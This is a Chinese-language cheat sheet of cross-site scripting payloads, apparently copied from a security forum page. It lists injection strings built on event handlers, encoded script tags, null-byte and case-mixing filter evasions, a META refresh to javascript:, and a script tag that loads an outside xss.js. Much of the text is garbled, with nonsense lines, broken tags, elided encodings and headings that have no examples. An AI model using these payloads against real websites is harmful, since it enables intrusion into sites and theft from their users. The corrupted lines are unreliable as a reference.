常用XSS命令合集
//经典语句,哈哈!“’>
'><marquee/onstart=confirm(123)>
<img src=”"οnerrοr=“alert(123)”>
%3cimg src%3d%22%22onerror%3d%22alert%28123%29%22%3e
"οnmοuseοver=alert(/xss/)
"’>
.,L/;.
,Mb
VuMHJ/;N JHNGFYHRFTGHHGGTG b<table CC
[;…B…B.,BLBbackground=‘javascript.:alert(([code])’>
{JAVASCRIPT}</scr ipt>
"><’
<scriript>ipt>
“;{JAVASCRIPT};”
‘;{JAVASCRIPT};’
;{JAVASCRIPT};
{JAVASCRIPT};
<SCR%00IPT>{JAVASCRIPT}</SCR%00IPT>
";{JAVASCRIPT};//
<’>
“”">
</objel/,BB 't>ODNL
“+alert(‘XSS’)+”
'>
=’>
<script>alert(‘XSS’)
%0a%0a.jsp
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
a.jsp/
">
<IMG src="/javascript.:alert"(‘XSS’)>
<IMG src="/JaVaScRiPt.:alert"(‘XSS’)>
<IMG src="/JaVaScRiPt.:alert"(“XSS”)>
“<IMG src=”/java"\0script.:alert(“XSS”)>";’>out
<META. HTTP-EQUIV="refresh"CONTENT=“0;url=javascript.:alert(‘XSS’);”>
<IFRAME. src="/javascript.:alert"(‘XSS’)>
(1)普通的XSS JavaScript注入
(2)IMG标签XSS使用JavaScript命令
(3)IMG标签无分号无引号
(4)IMG标签大小写不敏感
(5)HTML编码(必须有分号)
(6)修正缺陷IMG标签
<IMG “”">”>
(7)formCharCode标签(计算器)
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav…省略…S’)>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav…省略…S’)>
(10)十六进制编码也是没有分号(计算器)
(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
(16)解决限制字符(要求同页面)
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”>
(21)Non-alpha-non-digit XSS to 2